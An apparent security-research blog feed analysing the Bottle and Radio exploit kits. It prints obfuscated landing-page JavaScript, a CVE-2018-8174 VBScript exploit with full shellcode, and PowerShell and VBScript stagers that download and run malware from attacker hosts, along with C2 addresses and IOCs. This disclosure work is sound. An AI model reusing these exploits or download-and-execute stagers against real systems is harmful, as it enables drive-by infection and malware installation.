class="highlight"><pre class="highlight"><code>var _0x100f15 = navigator['userAgent']; var _0xed2c96 = _0x100f15['indexOf']('compatible') > -0x1 && _0x100f15['indexOf']('MSIE') > -0x1; var _0x4d34a9 = _0x100f15['indexOf']('Trident') > -0x1 && _0x100f15['indexOf']('rv:11.0') > -0x1; if (_0xed2c96) { if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) { var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);"); _0x41dde8['test'](_0x100f15); var _0x50d3cb = parseFloat(RegExp['$1']); return _0x50d3cb; } else { _0x53ccba(this, function () { var _0x2e6966 = new RegExp("function *$ *$"); var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i'); var _0x4fc827 = _0x118083('init'); if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) { _0x4fc827('0'); } else { _0x118083(); } })(); } </code></pre></div></div> If these checks are passed, the image is displayed. The <code class="language-plaintext highlighter-rouge">1.gif</code> used at this time is an image of the bottle. The <code class="language-plaintext highlighter-rouge">str1</code> displayed below the image is Japanese. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var str1 = '読み込み中。。。お待ちください&nbsp;&nbsp;&nbsp;&nbsp;'; /* --- Snip --- */ if (chk > 0x0) { var myimg = document['createElement']('img'); myimg['setAttribute']('id', 'ldimg'); myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline'); myimg['setAttribute']('src', 'file/1.gif'); document['body']['appendChild'](myimg); var myp = document['createElement']('p'); myp['setAttribute']('id', 'ldpr'); myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;'); document['body']['appendChild'](myp); for (var i = 0x0; i <= LOAD_SECOND; i++) { var progress = Math['round'](i * 0x64 / LOAD_SECOND); (function (_0x368e63) { setTimeout(function () { change_progress(_0x368e63, str1); }, i * 0x3e8); }(progress)); } </code></pre></div></div> <img src="https://nao-sec.org/assets/2019-12-13/2.png" alt="" /> And it gets the exploit code. Three parameters are used at that time. <ol> <li>Internet Explorer version</li> <li>is 64bit</li> <li>Adobe Flash Player version</li> </ol> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var is64 = 0x0; if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1; var fls = flashChecker(); ajax({ 'type': 'GET', 'dataType': 'jsonp', 'timeOut': 0x2710, 'url': '/conn.php?callback=?', 'data': { 'data1': chk, 'data2': is64, 'data3': fls['v'] }, </code></pre></div></div> When send this request, use the <code class="language-plaintext highlighter-rouge">ajax.min.js</code> you read earlier. Therefore, <code class="language-plaintext highlighter-rouge">callback</code> is added at the end. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } </code></pre></div></div> If successful, read the exploit code using the response data. When exploiting the vulnerability of Internet Explorer, read <code class="language-plaintext highlighter-rouge">file/vbs.vbs</code>, and when exploiting the vulnerability of Adobe Flash Player, read<code class="language-plaintext highlighter-rouge"> file/swf.swf</code>. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'success': function (_0x2ad29a) { if (_0x2ad29a[0x1] != '') { if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) { var _0x5517a0 = document['createElement']('embed'); _0x5517a0['src'] = _0x2ad29a[0x1]; _0x5517a0['setAttribute']('style', 'width:1px; height:1px'); document['body']['appendChild'](_0x5517a0); } else { var _0x33b1ee = cname + '='; var _0x3a1f81 = document['cookie']['split'](';'); for (var _0x2e7aac = 0x0; _0x2e7aac < _0x3a1f81['length']; _0x2e7aac++) { var _0x446c09 = _0x3a1f81[_0x2e7aac]; while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1); if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']); } return ''; } } else if (_0x2ad29a[0x0] != '') { var _0x5a39f4 = document['createElement']('script'); _0x5a39f4['type'] = 'text/vbscript'; _0x5a39f4['src'] = _0x2ad29a[0x0]; document['body']['appendChild'](_0x5a39f4); } } </code></pre></div></div> <code class="language-plaintext highlighter-rouge">vbs.vbs</code> exploits CVE-2018-8174 and <code class="language-plaintext highlighter-rouge">swf.swf</code> exploits CVE-2018-15982. <h3 id="cve-2018-8174">CVE-2018-8174</h3> <code class="language-plaintext highlighter-rouge">vbs.vbs</code> is a simple string encoding. Decoding this will give you almost the same code as the PoC. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit </code></pre></div></div> This is the shellcode that is running. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c17%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function </code></pre></div></div> <h3 id="cve-2018-15982">CVE-2018-15982</h3> <code class="language-plaintext highlighter-rouge">swf.swf</code> is almost the same as PoC. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package { import com.adobe.tvsdk.mediacore.metadata.Metadata; import flash.display.Sprite; import flash.events.Event; import flash.net.LocalConnection; import flash.system.Capabilities; import flash.utils.ByteArray; import flash.utils.Endian; public class Main extends Sprite { </code></pre></div></div> The executed shellcode is the same as CVE-2018-8174. <h2 id="shellcode">Shellcode</h2> The shellcode downloads and executes malware just like other EKs. The malware is not encrypted. The shellcode was encoded by Shikata Ga Nai Encoder. <img src="https://nao-sec.org/assets/2019-12-13/3.png" alt="" /> The decoded shellcode is a simple code that downloads and executes a malwre. The list of APIs to use is as follows: <img src="https://nao-sec.org/assets/2019-12-13/4.png" alt="" /> The API hashing algorithm is imul83hAdd. <img src="https://nao-sec.org/assets/2019-12-13/5.png" alt="" /> Interestingly, the URL string of the download destination was created as a mutex. <img src="https://nao-sec.org/assets/2019-12-13/6.png" alt="" /> The malware is created as svchost.exe in% temp% and then executed with the WinExe function. <img src="https://nao-sec.org/assets/2019-12-13/7.png" alt="" /> <h2 id="malware">Malware</h2> The malware is probably unique. We have never seen this elsewhere. According to my friend <a href="https://twitter.com/VK_Intel">@VK_Intel</a>, this could be a stealer targeting Japan. These are the characteristics of this malware. <ul> <li>Check if Japanese environment using GetUserDefaultUILanguage</li> <li>Download and use unzip.exe from these websites <ul> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> <li>ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe</li> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> </ul> </li> <li>Download and use Tor <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> </ul> </li> <li>C2 <ul> <li>[POST] 5frjkvw2w3wv6dnv.onion/conn.php</li> <li>[GET] 5frjkvw2w3wv6dnv.onion/rd.php</li> <li>[POST] 4w6ylniamu6x7e3a.onion/connect.php <ul> <li>User-Agent is <code class="language-plaintext highlighter-rouge">Mozilla/5.0 (Windows NT 6.1; WOW64)</code></li> </ul> </li> </ul> </li> <li>Main file location <ul> <li>%temp%</li> <li><code class="language-plaintext highlighter-rouge">C:\Users\Public</code></li> </ul> </li> </ul> <h2 id="finally">Finally</h2> Bottle Exploit Kit is an exploit kit targeting Japan. It’s not as sophisticated as the Exploit Kit, but JavaScript is elaborate. It has been observed for at least three months ago, and its activity continues today. The vulnerabilities it exploits are the same as other EKs. The same should be noted. Keep an eye on trend of it. Many people helped with our research. Special thanks to <a href="https://twitter.com/kafeine">@kafeine</a> and <a href="https://twitter.com/VK_Intel">@VK_Intel</a>. <h2 id="ioc">IOC</h2> <ul> <li>BottleEK <ul> <li>Traffic <ul> <li>priv.inteleksys.com (139.180.136.22) <ul> <li>/</li> <li>/file/style.css</li> <li>/file/ajax.min.js</li> <li>/file/main.js</li> <li>/file/1.gif</li> <li>/conn.php</li> <li>/file/vbs.vbs</li> <li>/file/swf.swf</li> </ul> </li> <li>sales.inteleksys.com (139.99.115.204)</li> </ul> </li> <li>Hash <ul> <li>main.js <ul> <li>588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26</li> </ul> </li> <li>1.gif <ul> <li>f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127</li> </ul> </li> <li>vbs.vbs <ul> <li>0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166</li> </ul> </li> <li>swf.swf <ul> <li>340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1</li> </ul> </li> </ul> </li> </ul> </li> <li>Malware <ul> <li>Traffic <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> <li>5frjkvw2w3wv6dnv.onion <ul> <li>/conn.php</li> <li>/rd.php</li> </ul> </li> <li>4w6ylniamu6x7e3a.onion <ul> <li>/connect.php</li> </ul> </li> </ul> </li> <li>Hash <ul> <li>Malware <ul> <li>914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246</li> <li>c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4</li> </ul> </li> <li>DLL <ul> <li>7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede</li> <li>6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82</li> </ul> </li> </ul> </li> </ul> </li> </ul>
Weak Drive-by Download attack with “Radio Exploit Kit”

Mon, 15 Jul 2019 15:00:00 -0000

First Since July 11 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”. Malvertising -> Unknown EK🚀 -> #AZORult(CC: @malware_traffic, @jeromesegura, @BleepinComputer)https://t.co/CkSfs38D8q pic.twitter.com/Uk37R7g1xh— nao_sec (@nao_sec) 2019年7月11日 The Radio Exploit Kit is not advanced. It exploits a very used vulnerability CVE-2016-0189. The exploit kit code is also unrefined. It is simply sending in malware (we are observing AZORult) using PoC of CVE-2016-0189. We don’t expect this to be a real threat. Most ordinary people will not be affected by this. However, I write this article because it is often observed in Japan. Be aware that these threats exist. Traffic This exploit kit is in the process of growing. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. Here we introduce v1.0, 1.1 and 1.2.0. Version First seen 2nd URL 1.0 2019-07-11_10-00 https[:]//radiobox-online.org/images/image.vbs2 1.1 2019-07-12-20-00 http[:]//95.215.207.24/error.jp 1.2.0 2019-07-13_14-00 http[:]//95.215.207.24/im/1.jpg 1.2.1 2019-07-13_15-00 http[:]//95.215.207.24/im/build1.jpg 1.2.2 2019-07-14_13-00 http[:]//95.215.207.24/im/build11.jpg 1.2.3 2019-07-14_20-00 http[:]//95.215.207.24/im/vkino2.mid v1.0 First, let’s look at v1.0. It is the traffic when we first encountered Radio EK. When redirected from the ad-network to https [:] // radiobox-online.org, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this. Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'" This will generate a second traffic. image.vbs2 is a very simple code. mm = "h" nn = "t" bb = "/" vv = ":" cc = "p" x = "." zz = "vbs" q = "0" w = "1" e = "2" r = "3" t = "4" y = "5" u = "6" a = "7" s = "8" f = "9" strr = mm&nn&nn&cc&vv&bb&bb rrts = t&y&x&w&e&x&e&w&y&x&w&y&a&bb rprt = strr&rrts d.Add "1", ""&rprt&"src/load2.jpg|"&temp&"\temp.vbs" Set x = CreateObject("MSXML2.XMLHTTP") For Each i In d x.open "GET", Split(d.Item(i), "|")(0), false x.send() This will load load2.jpg. load2.jpg is also a simple code. Set css = CreateObject("WScript.Shell") css = "http[:]//45.12.215.157/images/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next This process is repeated from 1.jpg to 5.jpg in order. The 1.jpg downloaded and executed in this way is malware. Malware is unencrypted and is plain binary. v1.1 Next, let’s look at v1.1. For v1.1, the code executed by CVE-2016-0189 is as follows: Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2" Unlike v1.0, the VBScript URL to be loaded next is http[:]//95.215.207.24/error.jp. At this time, the end of the URL is .jp. I don’t know if this is a mistake in hitting jpg or meaning Japan. error.jp will execute code similar to v1.0 load2.jpg. Set css = CreateObject("WScript.Shell") css = "http[:]//95.215.207.24/im/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next This is also repeated until /im/5.jpg. The downloaded / executed /im/1.jpg is malware. As in v1.0, malware is not encrypted. v1.2.0 Finally, let’s look at v1.2. It became very simple. It can be said that nothing is over. The code executed by CVE-2016-0189 is as follows: Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2" Thus, /im/1.jpg downloaded and executed is malware. As before, malware is not encrypted. The path of /im/1.jpg has only changed since v1.2.0. The essential process is the same. Conclusion Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.

<h2 id="first">First</h2> Since July 11 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”. <blockquote class="twitter-tweet" data-lang="ja">Malvertising -> Unknown EK🚀 -> <a href="https://twitter.com/hashtag/AZORult?src=hash&ref_src=twsrc%5Etfw">#AZORult</a> (CC: <a href="https://twitter.com/malware_traffic?ref_src=twsrc%5Etfw">@malware_traffic</a>, <a href="https://twitter.com/jeromesegura?ref_src=twsrc%5Etfw">@jeromesegura</a>, <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a>)<a href="https://t.co/CkSfs38D8q">https://t.co/CkSfs38D8q</a> <a href="https://t.co/Uk37R7g1xh">pic.twitter.com/Uk37R7g1xh</a>— nao_sec (@nao_sec) <a href="https://twitter.com/nao_sec/status/1149273164058222592?ref_src=twsrc%5Etfw">2019年7月11日</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> The Radio Exploit Kit is not advanced. It exploits a very used vulnerability CVE-2016-0189. The exploit kit code is also unrefined. It is simply sending in malware (we are observing AZORult) using PoC of CVE-2016-0189. We don’t expect this to be a real threat. Most ordinary people will not be affected by this. However, I write this article because it is often observed in Japan. Be aware that these threats exist. <h2 id="traffic">Traffic</h2> This exploit kit is in the process of growing. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. Here we introduce v1.0, 1.1 and 1.2.0. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Version First seen 2nd URL 1.0 2019-07-11_10-00 https[:]//radiobox-online.org/images/image.vbs2 1.1 2019-07-12-20-00 http[:]//95.215.207.24/error.jp 1.2.0 2019-07-13_14-00 http[:]//95.215.207.24/im/1.jpg 1.2.1 2019-07-13_15-00 http[:]//95.215.207.24/im/build1.jpg 1.2.2 2019-07-14_13-00 http[:]//95.215.207.24/im/build11.jpg 1.2.3 2019-07-14_20-00 http[:]//95.215.207.24/im/vkino2.mid </code></pre></div></div> <h3 id="v10">v1.0</h3> First, let’s look at v1.0. It is the traffic when we first encountered Radio EK. <img src="https://nao-sec.org/assets/2019-07-16/1.0.png" alt="" /> When redirected from the ad-network to <code class="language-plaintext highlighter-rouge">https [:] // radiobox-online.org</code>, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'" </code></pre></div></div> This will generate a second traffic. <code class="language-plaintext highlighter-rouge">image.vbs2</code> is a very simple code. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mm = "h" nn = "t" bb = "/" vv = ":" cc = "p" x = "." zz = "vbs" q = "0" w = "1" e = "2" r = "3" t = "4" y = "5" u = "6" a = "7" s = "8" f = "9" strr = mm&nn&nn&cc&vv&bb&bb rrts = t&y&x&w&e&x&e&w&y&x&w&y&a&bb rprt = strr&rrts d.Add "1", ""&rprt&"src/load2.jpg|"&temp&"\temp.vbs" Set x = CreateObject("MSXML2.XMLHTTP") For Each i In d x.open "GET", Split(d.Item(i), "|")(0), false x.send() </code></pre></div></div> This will load <code class="language-plaintext highlighter-rouge">load2.jpg</code>. <code class="language-plaintext highlighter-rouge">load2.jpg</code> is also a simple code. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set css = CreateObject("WScript.Shell") css = "http[:]//45.12.215.157/images/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next </code></pre></div></div> This process is repeated from <code class="language-plaintext highlighter-rouge">1.jpg</code> to<code class="language-plaintext highlighter-rouge"> 5.jpg</code> in order. The <code class="language-plaintext highlighter-rouge">1.jpg</code> downloaded and executed in this way is malware. Malware is unencrypted and is plain binary. <h3 id="v11">v1.1</h3> Next, let’s look at v1.1. <img src="https://nao-sec.org/assets/2019-07-16/1.1.png" alt="" /> For v1.1, the code executed by CVE-2016-0189 is as follows: <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2" </code></pre></div></div> Unlike v1.0, the VBScript URL to be loaded next is <code class="language-plaintext highlighter-rouge">http[:]//95.215.207.24/error.jp</code>. At this time, the end of the URL is <code class="language-plaintext highlighter-rouge">.jp</code>. I don’t know if this is a mistake in hitting <code class="language-plaintext highlighter-rouge">jpg</code> or meaning <code class="language-plaintext highlighter-rouge">Japan</code>. <code class="language-plaintext highlighter-rouge">error.jp</code> will execute code similar to v1.0 <code class="language-plaintext highlighter-rouge">load2.jpg</code>. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set css = CreateObject("WScript.Shell") css = "http[:]//95.215.207.24/im/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next </code></pre></div></div> This is also repeated until <code class="language-plaintext highlighter-rouge">/im/5.jpg</code>. The downloaded / executed <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> is malware. As in v1.0, malware is not encrypted. <h3 id="v120">v1.2.0</h3> Finally, let’s look at v1.2. <img src="https://nao-sec.org/assets/2019-07-16/1.2.png" alt="" /> It became very simple. It can be said that nothing is over. The code executed by CVE-2016-0189 is as follows: <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2" </code></pre></div></div> Thus, <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> downloaded and executed is malware. As before, malware is not encrypted. The path of <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> has only changed since v1.2.0. The essential process is the same. <h2 id="conclusion">Conclusion</h2> Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.
Steady Evolution of Fallout v4

Tue, 09 Jul 2019 15:00:00 -0000

